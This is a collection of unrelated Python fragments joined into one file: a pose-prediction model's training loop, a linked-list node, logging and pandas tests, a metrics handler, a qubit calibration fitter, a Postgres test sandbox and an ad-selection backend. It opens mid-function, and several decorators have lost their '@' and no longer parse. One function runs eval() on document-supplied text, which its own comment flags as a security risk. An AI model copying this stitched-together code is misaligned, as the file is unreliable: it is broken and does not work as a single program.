            if (opt.last_frame_skip or (i == 1) or (i < opt.n_past)):
                (h, skip) = h
            else:
                (h, _) = h
            h_cpaw = torch.cat([h, global_z, time_until_cp, delta_time], 1).detach()
            if (i < opt.n_past):
                # Conditioning phase: drive the LSTMs with ground truth.
                h_target = self.encoder(x[i])[0]
                h_target_cpaw = torch.cat([h_target, global_z, time_until_cp, delta_time], 1).detach()
                (zt, _, _) = self.posterior(h_target_cpaw)
                (zt_p, _, _) = self.prior(h_cpaw)
                if ((model_mode == 'posterior') or (model_mode == 'full')):
                    self.frame_predictor(torch.cat([h, zt, time_until_cp, delta_time], 1))
                elif (model_mode == 'prior'):
                    self.frame_predictor(torch.cat([h, zt_p, time_until_cp, delta_time], 1))
                x_in = x[i]
                gen_seq.append(x_in)
            else:
                # Generation phase: feed back the model's own prediction.
                if (i < len(x)):
                    h_target = self.encoder(x[i])[0]
                    h_target_cpaw = torch.cat([h_target, global_z, time_until_cp, delta_time], 1).detach()
                else:
                    h_target_cpaw = h_cpaw
                (zt, _, _) = self.posterior(h_target_cpaw)
                (zt_p, _, _) = self.prior(h_cpaw)
                if (model_mode == 'posterior'):
                    h = self.frame_predictor(torch.cat([h, zt, time_until_cp, delta_time], 1))
                elif ((model_mode == 'prior') or (model_mode == 'full')):
                    h = self.frame_predictor(torch.cat([h, zt_p, time_until_cp, delta_time], 1))
                x_in = self.decoder([h, skip]).detach()
                gen_seq.append(x_in)
        return gen_seq

    def forward(self, x, start_ix=0, cp_ix=(- 1)):
        """One training step on sequence `x`.

        Computes reconstruction (MSE), KL, control-point consistency (CPC)
        and alignment losses, backpropagates, and steps the optimizers
        (prior separately from the rest).

        Returns
        -------
        tuple of numpy scalars
            (mse, kld, cpc, align) losses, each divided by the sequence length.
        """
        if (type(x) == tuple):
            (pose_2d, pose_3d, camera_view) = x
            x = pose_3d
        opt = self.opt
        batch_size = x[0].shape[0]
        self.init_hidden(batch_size=batch_size)
        mse_loss = 0
        kld_loss = 0
        cpc_loss = 0
        align_loss = 0
        seq_len = len(x)
        start_ix = 0
        cp_ix = (seq_len - 1)
        (x_cp, global_z) = self.get_global_descriptor(x, start_ix, cp_ix)
        skip_prob = opt.skip_prob
        prev_i = 0
        max_skip_count = (seq_len * skip_prob)
        skip_count = 0
        probs = np.random.uniform(0, 1, (seq_len - 1))
        for i in range(1, seq_len):
            # Randomly drop frames (never i == 1 or the control point), which
            # guarantees h / h_pred / skip below are bound before use.
            if ((probs[(i - 1)] <= skip_prob) and (i >= opt.n_past) and (skip_count < max_skip_count) and (i != 1) and (i != cp_ix)):
                skip_count += 1
                continue
            if (i > 1):
                # Align the current encoding with the previous step's prediction.
                align_loss += self.align_criterion(h[0], h_pred)
            time_until_cp = torch.zeros(batch_size, 1).fill_((((cp_ix - i) + 1) / cp_ix)).to(x_cp)
            delta_time = torch.zeros(batch_size, 1).fill_(((i - prev_i) / cp_ix)).to(x_cp)
            prev_i = i
            h = self.encoder(x[(i - 1)])
            h_target = self.encoder(x[i])[0]
            if (opt.last_frame_skip or (i <= opt.n_past)):
                (h, skip) = h
            else:
                h = h[0]
            # Encodings augmented with the global descriptor and time features.
            h_cpaw = torch.cat([h, global_z, time_until_cp, delta_time], 1)
            h_target_cpaw = torch.cat([h_target, global_z, time_until_cp, delta_time], 1)
            (zt, mu, logvar) = self.posterior(h_target_cpaw)
            (zt_p, mu_p, logvar_p) = self.prior(h_cpaw)
            h_pred = self.frame_predictor(torch.cat([h, zt, time_until_cp, delta_time], 1))
            x_pred = self.decoder([h_pred, skip])
            if (i == cp_ix):
                # CPC: the prior-driven rollout must hit the control point.
                h_pred_p = self.frame_predictor(torch.cat([h, zt_p, time_until_cp, delta_time], 1))
                x_pred_p = self.decoder([h_pred_p, skip])
                cpc_loss = self.mse_criterion(x_pred_p, x_cp)
            mse_loss += self.mse_criterion(x_pred, x[i])
            kld_loss += self.kl_criterion(mu, logvar, mu_p, logvar_p)
        # Main objective updates everything except the prior; retain_graph so
        # the prior's own backward pass below can reuse the graph.
        loss = ((mse_loss + (kld_loss * opt.beta)) + (align_loss * opt.weight_align))
        loss.backward(retain_graph=True)
        self.update_model_without_prior()
        # Prior is trained separately on KL plus the CPC term.
        self.prior.zero_grad()
        prior_loss = (kld_loss + (cpc_loss * opt.weight_cpc))
        prior_loss.backward()
        self.update_prior()
        return ((mse_loss.data.cpu().numpy() / seq_len), (kld_loss.data.cpu().numpy() / seq_len), (cpc_loss.data.cpu().numpy() / seq_len), (align_loss.data.cpu().numpy() / seq_len))

    def update_prior(self):
        """Optimizer step for the prior network only."""
        self.prior_optimizer.step()

    def update_model_without_prior(self):
        """Optimizer step for every sub-network except the prior."""
        self.frame_predictor_optimizer.step()
        self.posterior_optimizer.step()
        self.encoder_optimizer.step()
        self.decoder_optimizer.step()

    def update_model(self):
        """Optimizer step for every sub-network, including the prior."""
        self.frame_predictor_optimizer.step()
        self.posterior_optimizer.step()
        self.prior_optimizer.step()
        self.encoder_optimizer.step()
        self.decoder_optimizer.step()

    def save(self, fname, epoch):
        """Checkpoint all networks, optimizers, the epoch, and `opt`.

        `opt.backbone_net` (a module object) is temporarily zeroed so `opt`
        itself can be serialized, then restored.
        """
        backbone_net = self.opt.backbone_net
        self.opt.backbone_net = 0
        states = {'encoder': self.encoder.state_dict(), 'decoder': self.decoder.state_dict(), 'frame_predictor': self.frame_predictor.state_dict(), 'posterior': self.posterior.state_dict(), 'prior': self.prior.state_dict(), 'encoder_opt': self.encoder_optimizer.state_dict(), 'decoder_opt': self.decoder_optimizer.state_dict(), 'frame_predictor_opt': self.frame_predictor_optimizer.state_dict(), 'posterior_opt': self.posterior_optimizer.state_dict(), 'prior_opt': self.prior_optimizer.state_dict(), 'epoch': epoch, 'opt': self.opt}
        torch.save(states, fname)
        self.opt.backbone_net = backbone_net

    def load(self, pth=None, states=None):
        """Restore networks, optimizers and `opt` from a checkpoint.

        Accepts either a path (`pth`) or an already-loaded `states` dict.
        Returns the epoch to resume from.
        """
        if (states is None):
            states = torch.load(pth)
        self.encoder.load_state_dict(states['encoder'])
        self.decoder.load_state_dict(states['decoder'])
        self.frame_predictor.load_state_dict(states['frame_predictor'])
        self.posterior.load_state_dict(states['posterior'])
        self.prior.load_state_dict(states['prior'])
        self.encoder_optimizer.load_state_dict(states['encoder_opt'])
        self.decoder_optimizer.load_state_dict(states['decoder_opt'])
        self.frame_predictor_optimizer.load_state_dict(states['frame_predictor_opt'])
        self.posterior_optimizer.load_state_dict(states['posterior_opt'])
        self.prior_optimizer.load_state_dict(states['prior_opt'])
        self.opt = states['opt']
        start_epoch = (states['epoch'] + 1)
        return start_epoch
class Link():
    """Linked-list node whose neighbour pointers are weak references.

    `prev` and `next` hold `weakref.ref` objects; `key` is optional.
    Pickling dereferences the weakrefs (state holds strong references),
    and unpickling rebuilds them.
    """

    __slots__ = ('prev', 'next', 'key', '__weakref__')

    def __getstate__(self):
        # Dereference the weakrefs so the serialized state carries the
        # actual neighbour objects; include `key` only if it is set.
        state = [self.prev(), self.next()]
        if hasattr(self, 'key'):
            state.append(self.key)
        return state

    def __setstate__(self, state):
        self.prev = weakref.ref(state[0])
        self.next = weakref.ref(state[1])
        if (len(state) == 3):
            self.key = state[2]
def test_setting_logging():
    """Check how CLI flags and explicit config interact to set the root log level."""
    apply_patch_if_needed_and_test_it()
    quiet = Args(logging_verbose=False, logging_debug=False)
    verbose = Args(logging_verbose=True, logging_debug=False)
    debug = Args(logging_verbose=False, logging_debug=True)
    both = Args(logging_verbose=True, logging_debug=True)
    # (args, basic-config dict, expected effective level) -- applied in order,
    # since each call reconfigures the shared root logger.
    cases = [
        (quiet, {'level': logging.DEBUG}, logging.DEBUG),
        (quiet, {'level': 'error'}, logging.ERROR),
        (quiet, {}, logging.WARNING),
        (verbose, {}, logging.INFO),
        (debug, {}, logging.DEBUG),
        (quiet, {'level': 5}, 5),
        (both, {}, logging.DEBUG),
    ]
    for cli_args, config, expected in cases:
        run_logging_basic_config(cli_args, config)
        assert (logging.root.getEffectiveLevel() == expected)
class HostedGraphiteHandler(Handler):
    """Handler that ships metrics to hostedgraphite.com.

    Each metric is prefixed with the account API key and then delegated
    to a wrapped GraphiteHandler, which does the actual transport.
    """

    def __init__(self, config=None):
        Handler.__init__(self, config)
        # The API key doubles as the metric namespace prefix.
        self.key = self.config['apikey'].lower().strip()
        self.graphite = GraphiteHandler(self.config)

    def get_default_config_help(self):
        """Return help text for this handler's configuration options."""
        help_map = super(HostedGraphiteHandler, self).get_default_config_help()
        help_map.update({'apikey': 'Api key to use', 'host': 'Hostname', 'port': 'Port', 'proto': 'udp or tcp', 'timeout': '', 'batch': 'How many to store before sending to the graphite server', 'max_backlog_multiplier': 'how many batches to store before trimming', 'trim_backlog_multiplier': 'Trim down how many batches'})
        return help_map

    def get_default_config(self):
        """Return the default configuration for this handler."""
        defaults = super(HostedGraphiteHandler, self).get_default_config()
        defaults.update({'apikey': '', 'host': 'carbon.hostedgraphite.com', 'port': 2003, 'proto': 'tcp', 'timeout': 15, 'batch': 1, 'max_backlog_multiplier': 5, 'trim_backlog_multiplier': 4})
        return defaults

    def process(self, metric):
        """Prefix the metric with the API key and hand it to graphite."""
        prefixed = self.key + '.' + str(metric)
        self.graphite.process(prefixed)

    def _process(self, metric):
        """Internal variant of process(), bypassing the public entry point."""
        prefixed = self.key + '.' + str(metric)
        self.graphite._process(prefixed)

    def _flush(self):
        self.graphite._flush()

    def flush(self):
        self.graphite.flush()
class AmpCalFitter(BaseGateFitter):
    """Fitter for single-qubit amplitude (rotation-angle) calibration data."""

    def __init__(self, backend_result, xdata, qubits, fit_p0, fit_bounds):
        """Set up the base fitter with per-point circuit names and the
        amplitude-calibration fit function; expected state is '1'."""
        circuit_names = []
        for (cind, _) in enumerate(xdata):
            circuit_names.append(('ampcal1Qcircuit_%d_' % cind))
        BaseGateFitter.__init__(self, '$AmpCal1Q$', backend_result, xdata, qubits, self._amp_cal_fit, fit_p0, fit_bounds, circuit_names, expected_state='1')

    # NOTE(review): defined without `self` and with no @staticmethod decorator
    # visible here, yet referenced above as `self._amp_cal_fit` (which would
    # bind the instance as `x`). Presumably a @staticmethod decorator was lost
    # in extraction -- confirm against the original file.
    def _amp_cal_fit(x, thetaerr, c):
        """Amplitude-calibration fit curve, delegating to the shared
        calibration fit function with fixed amplitude and phase offsets."""
        return AmpCalFitter._cal_fit_fun(x, (- 0.5), thetaerr, thetaerr, (np.pi / 2), (np.pi / 2), c)

    def guess_params(self, qind=0):
        """Initial guesses for the fit: offset `c` from the first measured
        point, angle error from half the drop between the first two points."""
        c = self.ydata['0'][qind]['mean'][0]
        theta_err = ((self.ydata['0'][qind]['mean'][0] - self.ydata['0'][qind]['mean'][1]) / 2)
        return [theta_err, c]

    def angle_err(self, qind=(- 1)):
        """Return half of the fitted theta-error parameter for qubit `qind`."""
        fitparam = self._get_param(0, qind, series='0', err=False)
        return (np.array(fitparam) / 2.0)

    def plot(self, qind, series='0', ax=None, show_plot=False):
        """Delegate plotting to the base fitter and return the axis used."""
        ax = BaseGateFitter.plot(self, qind, series, ax, show_plot)
        return ax
def test_update_optionset_error(db):
    """Updating an option against a locked optionset must raise ValidationError."""
    locked_optionset = OptionSet.objects.first()
    locked_optionset.locked = True
    locked_optionset.save()
    # Pick an option not already attached to the locked optionset.
    candidate = Option.objects.exclude(optionsets=locked_optionset).first()
    with pytest.raises(ValidationError):
        OptionLockedValidator(candidate)({'optionsets': [locked_optionset], 'locked': False})
class ChatMemberUpdated(Object, Update):
    """Represents a change in the status of a chat member.

    Holds the chat, the user who performed the action, the event date,
    the member's old and new states, and the invite link used (if any).
    """

    def __init__(self, *, client: 'pyrogram.Client'=None, chat: 'types.Chat', from_user: 'types.User', date: datetime, old_chat_member: 'types.ChatMember', new_chat_member: 'types.ChatMember', invite_link: 'types.ChatInviteLink'=None):
        super().__init__(client)
        self.chat = chat
        self.from_user = from_user
        self.date = date
        self.old_chat_member = old_chat_member
        self.new_chat_member = new_chat_member
        self.invite_link = invite_link

    # NOTE(review): defined without `self` and no @staticmethod decorator is
    # visible here -- presumably a staticmethod whose decorator was lost in
    # extraction; confirm against the original file.
    def _parse(client: 'pyrogram.Client', update: Union[('raw.types.UpdateChatParticipant', 'raw.types.UpdateChannelParticipant')], users: Dict[(int, 'raw.types.User')], chats: Dict[(int, 'raw.types.Chat')]) -> 'ChatMemberUpdated':
        """Build a ChatMemberUpdated from a raw Telegram participant update."""
        # Basic-group updates carry `chat_id`; channel/supergroup updates
        # carry `channel_id` (no default: one of the two must be present).
        chat_id = (getattr(update, 'chat_id', None) or getattr(update, 'channel_id'))
        old_chat_member = None
        new_chat_member = None
        invite_link = None
        if update.prev_participant:
            old_chat_member = types.ChatMember._parse(client, update.prev_participant, users, chats)
        if update.new_participant:
            new_chat_member = types.ChatMember._parse(client, update.new_participant, users, chats)
        if update.invite:
            invite_link = types.ChatInviteLink._parse(client, update.invite, users)
        return ChatMemberUpdated(chat=types.Chat._parse_chat(client, chats[chat_id]), from_user=types.User._parse(client, users[update.actor_id]), date=utils.timestamp_to_datetime(update.date), old_chat_member=old_chat_member, new_chat_member=new_chat_member, invite_link=invite_link, client=client)
class Temporal(object):
    """Manage a throw-away PostgreSQL cluster for test sandboxes.

    Usable as a context manager or as a decorator: entering lazily creates
    a temporary cluster, opens a sandbox connection, publishes it and a set
    of helpers into `builtins`, and creates a per-sandbox schema; exiting
    tears the sandbox down and restores the previous builtins.
    """

    # Template for per-sandbox schema names: sandbox<pid>_<id>.
    format_sandbox_id = staticmethod('sandbox{0}_{1}'.format)
    # Template for the on-disk cluster directory name.
    cluster_dirname = staticmethod('pg_tmp_{0}_{1}'.format)
    cluster = None
    _init_pid_ = None
    _local_id_ = 0
    # Names this class publishes into (and restores from) builtins.
    builtins_keys = {'connector', 'db', 'do', 'xact', 'proc', 'settings', 'prepare', 'sqlexec', 'newdb'}

    def __init__(self):
        self.builtins_stack = deque()
        self.sandbox_id = 0
        # Hand out a unique id per Temporal instance via a class-level counter.
        self.__class__._local_id_ = self.local_id = (self.__class__._local_id_ + 1)

    def __call__(self, callable):
        """Decorator form: run `callable` inside this temporal context."""
        def in_pg_temporal_context(*args, **kw):
            with self:
                return callable(*args, **kw)
        n = getattr(callable, '__name__', None)
        if n:
            in_pg_temporal_context.__name__ = n
        return in_pg_temporal_context

    def destroy(self):
        """Terminate backends, then stop and drop the cluster (atexit hook).

        Only runs in the process that created the cluster.
        """
        if (os.getpid() == self._init_pid_):
            # Best-effort: kill any open backends before stopping the cluster.
            try:
                # BUG FIX: this previously read the local name `cluster` before
                # it was assigned below, raising UnboundLocalError that the
                # except clause silently swallowed -- so backends were never
                # terminated. Read the attribute instead.
                c = self.cluster.connection(user='test', database='template1')
                with c:
                    if (c.version_info[:2] <= (9, 1)):
                        c.sys.terminate_backends()
                    else:
                        c.sys.terminate_backends_92()
            except Exception:
                pass
            cluster = self.cluster
            self.cluster = None
            self._init_pid_ = None
            if (cluster is not None):
                cluster.stop()
                cluster.wait_until_stopped(timeout=5)
                cluster.drop()

    def init(self, installation_factory=installation.default, inshint={'hint': 'Try setting the PGINSTALLATION environment variable to the `pg_config` path'}):
        """Create, configure and start the temporary cluster (idempotent).

        Does nothing when a cluster already exists or PGTEST points at an
        external database.

        Raises
        ------
        ClusterError
            If no installation can be found or no local port is available.
        """
        if ((self.cluster is not None) or ('PGTEST' in os.environ)):
            return
        self._init_pid_ = os.getpid()
        atexit.register(self.destroy)
        self.cluster_path = os.path.join(os.environ.get('HOME', os.getcwd()), self.cluster_dirname(self._init_pid_, self.local_id))
        self.logfile = os.path.join(self.cluster_path, 'logfile')
        installation = installation_factory()
        if (installation is None):
            raise ClusterError('could not find the default pg_config', details=inshint)
        vi = installation.version_info
        cluster = Cluster(installation, self.cluster_path)
        # Start from a clean slate if a previous run left data behind.
        if cluster.initialized():
            cluster.drop()
        cluster.encoding = 'utf-8'
        cluster.init(user='test', encoding=cluster.encoding, logfile=None)
        try:
            self.cluster_port = find_available_port()
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # still propagate.
            raise ClusterError('could not find a port for the test cluster on localhost', creator=cluster)
        if (vi[:2] > (9, 6)):
            # WAL senders are irrelevant for a throw-away test cluster.
            cluster.settings['max_wal_senders'] = '0'
        cluster.settings.update(dict(port=str(self.cluster_port), max_connections='20', shared_buffers='200', listen_addresses='localhost', log_destination='stderr', log_min_messages='FATAL', max_prepared_transactions='10'))
        # The socket-directory setting was pluralized in PostgreSQL 9.3.
        if (installation.version_info[:2] < (9, 3)):
            cluster.settings.update(dict(unix_socket_directory=cluster.data_directory))
        else:
            cluster.settings.update(dict(unix_socket_directories=cluster.data_directory))
        with open(self.logfile, 'w') as lfo:
            cluster.start(logfile=lfo)
        cluster.wait_until_started()
        c = cluster.connection(user='test', database='template1')
        with c:
            c.execute('create database test')
        self.cluster = cluster

    def push(self):
        """Open a sandbox connection and publish helpers into builtins."""
        if ('PGTEST' in os.environ):
            from . import open as pg_open
            c = pg_open(os.environ['PGTEST'])
        else:
            c = self.cluster.connection(user='test')
        c.connect()
        extras = []
        sbid = self.format_sandbox_id(os.getpid(), (self.sandbox_id + 1))
        def new_pg_tmp_connection(l=extras, clone=c.clone, sbid=sbid):
            # Track clones so pop() can close them with the sandbox; the
            # sandbox schema is prepended to each clone's search path.
            l.append(clone())
            l[(- 1)].settings['search_path'] = ((str(sbid) + ',') + l[(- 1)].settings['search_path'])
            return l[(- 1)]
        local_builtins = {'db': c, 'prepare': c.prepare, 'xact': c.xact, 'sqlexec': c.execute, 'do': c.do, 'settings': c.settings, 'proc': c.proc, 'connector': c.connector, 'new': new_pg_tmp_connection}
        if (not self.builtins_stack):
            # First push: snapshot any pre-existing builtins so pop() can
            # restore them when the stack fully unwinds.
            current = {k: builtins.__dict__[k] for k in self.builtins_keys if (k in builtins.__dict__)}
            self.builtins_stack.append((current, []))
        self.builtins_stack.append((local_builtins, extras))
        builtins.__dict__.update(local_builtins)
        self.sandbox_id += 1

    def pop(self, exc, drop_schema='DROP SCHEMA {0} CASCADE'.format):
        """Tear down the current sandbox and restore the previous builtins.

        On normal exit or an ordinary Exception, close the sandbox
        connections and drop the sandbox schema; on non-Exception unwinds
        (e.g. KeyboardInterrupt) leave connections untouched.
        """
        (local_builtins, extras) = self.builtins_stack.pop()
        self.sandbox_id -= 1
        if (len(self.builtins_stack) > 1):
            builtins.__dict__.update(self.builtins_stack[(- 1)][0])
        else:
            # Stack exhausted: restore the original builtins snapshot.
            # BUG FIX: the stack stores (dict, extras) pairs; previously the
            # whole tuple was used, so `x in previous` was always False and
            # the saved builtins were never restored.
            previous = self.builtins_stack.popleft()[0]
            for x in self.builtins_keys:
                if (x in previous):
                    builtins.__dict__[x] = previous[x]
                else:
                    builtins.__dict__.pop(x, None)
        if ((exc is None) or isinstance(exc, Exception)):
            # Close the sandbox connection and any clones made via new().
            for xdb in ([local_builtins['db']] + list(extras)):
                if (xdb.closed is False):
                    xdb.interrupt()
                    xdb.close()
            xdb = local_builtins['db']
            with xdb.clone() as c:
                c.execute(drop_schema(self.format_sandbox_id(os.getpid(), (self.sandbox_id + 1))))
        else:
            pass

    def _init_c(self, cxn):
        """Create this sandbox's schema and prepend it to the search path."""
        cxn.connect()
        sb = self.format_sandbox_id(os.getpid(), self.sandbox_id)
        cxn.execute(('CREATE SCHEMA ' + sb))
        cxn.settings['search_path'] = ','.join((sb, cxn.settings['search_path']))

    def __enter__(self):
        if (self.cluster is None):
            self.init()
        self.push()
        try:
            self._init_c(builtins.db)
        except Exception as e:
            # Schema creation failed: unwind the sandbox we just pushed.
            self.pop(e)
            raise

    def __exit__(self, exc, val, tb):
        self.pop(val)
def test_setitem(stream):
    """Column assignment on a streaming DataFrame must mirror pandas semantics
    (derived column, scalar broadcast, and multi-column copy)."""
    source = pd.DataFrame({'x': list(range(10)), 'y': [1] * 10})
    sdf = DataFrame(example=source.iloc[:0], stream=stream)
    stream = sdf.stream
    sdf['z'] = sdf['x'] * 2
    sdf['a'] = 10
    sdf[['c', 'd']] = sdf[['x', 'y']]
    L = sdf.mean().stream.gather().sink_to_list()
    for chunk in (source.iloc[:3], source.iloc[3:7], source.iloc[7:]):
        stream.emit(chunk)
    # Apply the same mutations to the plain frame for comparison.
    source['z'] = source['x'] * 2
    source['a'] = 10
    source[['c', 'd']] = source[['x', 'y']]
    wait_for(lambda: L and L[-1].equals(source.mean()), 1)
# NOTE(review): the six lines below read like click decorator calls whose
# leading '@' was lost in extraction (@_benchmark.command, @_option,
# @_range_option, @click.option(...)); as written they are not valid
# standalone statements — confirm against the original file.
_benchmark.command(name='analyze')
_option
_range_option
('--datetime', '-d', 'datetime_range', help="Filter execution progress plot to contain data within the specified datetime range, e.g '2021-11-16T10:00:00-2021-11-16T11:00:00'", type=str, callback=(lambda c, p, v: _to_datetime_range(v)))
('--title', '-t', help='Title of the generated plots.', type=str, callback=(lambda c, p, v: (v if (v is not None) else c.params['workflow'])))
('--interval', '-i', help='Ticks interval in seconds for execution progress plot', type=int)
def analyze_command(workflow: str, workflow_range: Tuple[(int, int)], datetime_range: Tuple[(str, str)], title: str, interval: Optional[int]) -> NoReturn:
    """Run benchmark analysis for *workflow*, logging (not raising) failures."""
    plot_params = {'title': title, 'time_interval': interval, 'datetime_range': datetime_range}
    try:
        analyze(workflow, workflow_range, plot_params)
    except Exception as e:
        # Deliberate catch-all: a CLI analysis failure is reported, not fatal.
        logger.error(f'Something went wrong when analyzing results: {e}')
# NOTE(review): '_if_fails' looks like a decorator whose '@' was lost in
# extraction — confirm against the original file.
_if_fails
def test_parameter_generators(n_evaluations=100):
    """Yield one optimizer check per (generator type, maximize flag) pair
    (nose-style generator test)."""
    for generator_type in [RandomParameterOptimizer, RegressionParameterOptimizer, SubgridParameterOptimizer, AnnealingParameterOptimizer]:
        for maximize in [True, False]:
            (yield (check_optimizer, generator_type, maximize, n_evaluations))
# NOTE(review): these two lines appear to be @patch(...) / @patch.object(...)
# decorator arguments whose decorator prefix was lost in extraction (the test
# receives mock_invoke_step and mock_get_module) — confirm against the original.
('pypyr.moduleloader.get_module')
(Step, 'invoke_step')
def test_run_pipeline_steps_complex_swallow_false(mock_invoke_step, mock_get_module):
    """With swallow=False the step is invoked exactly once and the context
    passed through unchanged (same keys, same length)."""
    step = Step({'name': 'step1', 'swallow': False})
    context = get_test_context()
    original_len = len(context)
    with patch_logger('pypyr.dsl', logging.DEBUG) as mock_logger_debug:
        step.run_step(context)
    mock_logger_debug.assert_any_call('done')
    # The full test context must reach invoke_step untouched.
    mock_invoke_step.assert_called_once_with(context={'key1': 'value1', 'key2': 'value2', 'key3': 'value3', 'key4': [{'k4lk1': 'value4', 'k4lk2': 'value5'}, {'k4lk1': 'value6', 'k4lk2': 'value7'}], 'key5': False, 'key6': True, 'key7': 77})
    assert (len(context) == original_len)
def configureLogging():
    """Attach a stderr StreamHandler with a terse level-prefixed format to the
    root logger and raise its threshold to WARNING."""
    formatter = logging.Formatter('%(levelname)-3s -: %(message)s', datefmt=None)
    handler = logging.StreamHandler()
    handler.setFormatter(formatter)
    root_logger = logging.getLogger()
    root_logger.setLevel(logging.WARNING)
    root_logger.addHandler(handler)
def sharp_expr(extr, expr):
    """Evaluate a document '#expr' field after rewriting its operators.

    ``extr.expand`` substitutes document variables; the textual operators
    are then rewritten to Python equivalents before eval().  On any failure
    the raw expression is echoed back wrapped in an error span.
    """
    try:
        expr = extr.expand(expr)
        # Rewrite a single '=' to '==' unless preceded by !, < or >.
        expr = re.sub(r'(?<![!<>])=', '==', expr)
        # BUG FIX: the div/round patterns were written in non-raw strings, so
        # '\b' became a literal backspace (\x08) and never matched; 'mod' also
        # lacked word boundaries and would corrupt words containing it.
        expr = re.sub(r'\bmod\b', '%', expr)
        expr = re.sub(r'\bdiv\b', '/', expr)
        expr = re.sub(r'\bround\b', '|ROUND|', expr)
        # SECURITY: eval() on document-supplied text executes arbitrary code;
        # only acceptable for fully trusted documents.
        return text_type(eval(expr))
    except Exception:
        # Narrowed from a bare except so KeyboardInterrupt/SystemExit escape.
        return ('<span class="error">%s</span>' % expr)
class ScheduleItemAttendee(TimeStampedModel):
    """Through-model linking a user to a schedule item they attend."""
    schedule_item = models.ForeignKey(ScheduleItem, on_delete=models.CASCADE, verbose_name=_('schedule item'), related_name='attendees')
    # '+' disables the reverse accessor from User back to this model.
    user = models.ForeignKey('users.User', on_delete=models.CASCADE, null=False, blank=False, verbose_name=_('user'), related_name='+')
    class Meta():
        # A user may register for a given schedule item at most once.
        unique_together = ('user', 'schedule_item')
def make_mating_pool(population_mol: List[Mol], population_scores, offspring_size: int):
    """Sample ``offspring_size`` molecules with replacement, each molecule's
    probability proportional to its score."""
    total = sum(population_scores)
    probabilities = [score / total for score in population_scores]
    return np.random.choice(population_mol, p=probabilities, size=offspring_size, replace=True)
class ProbabilisticFlightBackend(AdvertisingEnabledBackend):
    """Ad backend that picks a flight probabilistically, weighted by how many
    clicks/views each flight still needs this interval.  Campaign types are
    tried in priority order: paid, affiliate, community, publisher-house,
    then house."""
    def select_flight(self):
        """Return a flight that still needs impressions, or None."""
        flights = self.get_candidate_flights()
        paid_flights = []
        affiliate_flights = []
        community_flights = []
        publisher_house_flights = []
        house_flights = []
        # Bucket candidate flights by campaign type (priority order above).
        for flight in flights:
            if (flight.campaign.campaign_type == PAID_CAMPAIGN):
                paid_flights.append(flight)
            elif (flight.campaign.campaign_type == AFFILIATE_CAMPAIGN):
                affiliate_flights.append(flight)
            elif (flight.campaign.campaign_type == COMMUNITY_CAMPAIGN):
                community_flights.append(flight)
            elif (flight.campaign.campaign_type == PUBLISHER_HOUSE_CAMPAIGN):
                publisher_house_flights.append(flight)
            else:
                house_flights.append(flight)
        # An explicitly requested ad/campaign bypasses the weighting entirely.
        if (flights and (self.ad_slug or self.campaign_slug)):
            return random.choice(flights)
        for possible_flights in (paid_flights, affiliate_flights, community_flights, publisher_house_flights, house_flights):
            # Build cumulative [lo, hi, flight] ranges sized by weighted need,
            # then draw a point uniformly over the total.
            flight_range = []
            total_clicks_needed = 0
            for flight in possible_flights:
                if (not self.filter_flight(flight)):
                    continue
                if any(((flight.clicks_needed_this_interval() > 0), (flight.views_needed_this_interval() > 0))):
                    weighted_clicks_needed_this_interval = flight.weighted_clicks_needed_this_interval(self.publisher)
                    flight_range.append([total_clicks_needed, (total_clicks_needed + weighted_clicks_needed_this_interval), flight])
                    total_clicks_needed += weighted_clicks_needed_this_interval
            # NOTE(review): randint and both <= bounds are inclusive, so
            # adjacent ranges share a boundary value and the earlier flight
            # wins ties — confirm this overlap is intentional.
            choice = random.randint(0, total_clicks_needed)
            for (min_clicks, max_clicks, flight) in flight_range:
                if (min_clicks <= choice <= max_clicks):
                    return flight
        return None
    def get_ad_ctr_weight(self, ad):
        """Map an ad's sampled CTR to an integer bonus weight (0-4); the
        highest threshold the CTR clears wins."""
        weights = {0.075: 1, 0.1: 2, 0.125: 3, 0.15: 4}
        ad_weighting = 0
        for (threshold, weight) in weights.items():
            if ((ad.sampled_ctr >= threshold) and (weight > ad_weighting)):
                ad_weighting = weight
        return ad_weighting
    def select_ad_for_flight(self, flight):
        """Weighted-random ad pick within *flight* (weight = placement
        priority, plus CTR bonus when the flight opts in); None on no match."""
        if (not flight):
            return None
        chosen_ad = None
        weighted_ad_choices = []
        if self.ad_slug:
            candidate_ads = flight.advertisements.filter(slug=self.ad_slug)
        else:
            candidate_ads = flight.advertisements.filter(live=True, ad_types__slug__in=self.ad_types)
        candidate_ads = candidate_ads.select_related('flight').prefetch_related('ad_types')
        for advertisement in candidate_ads:
            placement = self.get_placement(advertisement)
            if (not placement):
                log.warning("Couldn't find a matching ad placement. ad=%s, placements=%s", advertisement, self.placements)
                continue
            # Each ad appears `priority` times in the draw pool.
            priority = placement.get('priority', 1)
            if flight.prioritize_ads_ctr:
                priority += self.get_ad_ctr_weight(advertisement)
            for _ in range(priority):
                weighted_ad_choices.append(advertisement)
        if weighted_ad_choices:
            chosen_ad = random.choice(weighted_ad_choices)
        else:
            log.warning('Chosen flight has no matching live ads! flight=%s, ad_types=%s', flight, self.ad_types)
        return chosen_ad
def add_bb_into_image(image, bb, color=(255, 0, 0), thickness=2, label=None):
    """Draw *bb* (absolute XYX2Y2 coordinates) on *image*, optionally with a
    filled label box above the top-left corner.  *color* is RGB; OpenCV wants
    BGR, hence the channel swap.  Returns the (mutated) image."""
    red, green, blue = int(color[0]), int(color[1]), int(color[2])
    font = cv2.FONT_HERSHEY_SIMPLEX
    font_scale = 0.5
    font_thickness = 1
    x1, y1, x2, y2 = (int(v) for v in bb.getAbsoluteBoundingBox(BBFormat.XYX2Y2))
    cv2.rectangle(image, (x1, y1), (x2, y2), (blue, green, red), thickness)
    if label is not None:
        text_w, text_h = cv2.getTextSize(label, font, font_scale, font_thickness)[0]
        xin_bb = x1 + thickness
        yin_bb = (y1 - text_h) + int(12.5 * font_scale)
        # If the label would fall above the image, draw it inside the box.
        if (yin_bb - text_h) <= 0:
            yin_bb = y1 + text_h
        bg_x = x1 - int(thickness / 2)
        bg_y = (y1 - text_h) - int(thickness / 2)
        # Filled background rectangle behind the label text.
        cv2.rectangle(image, (bg_x, bg_y - thickness), (bg_x + text_w + (thickness * 3), bg_y + text_h + int(12.5 * font_scale)), (blue, green, red), -1)
        cv2.putText(image, label, (xin_bb, yin_bb), font, font_scale, (0, 0, 0), font_thickness, cv2.LINE_AA)
    return image
class Space(metaclass=MetaSpace):
    """A flat Hilbert-space dimension: a single integer size with the
    list-of-dims protocol (as_list/flat/step/dims2idx/...) used by composite
    spaces."""
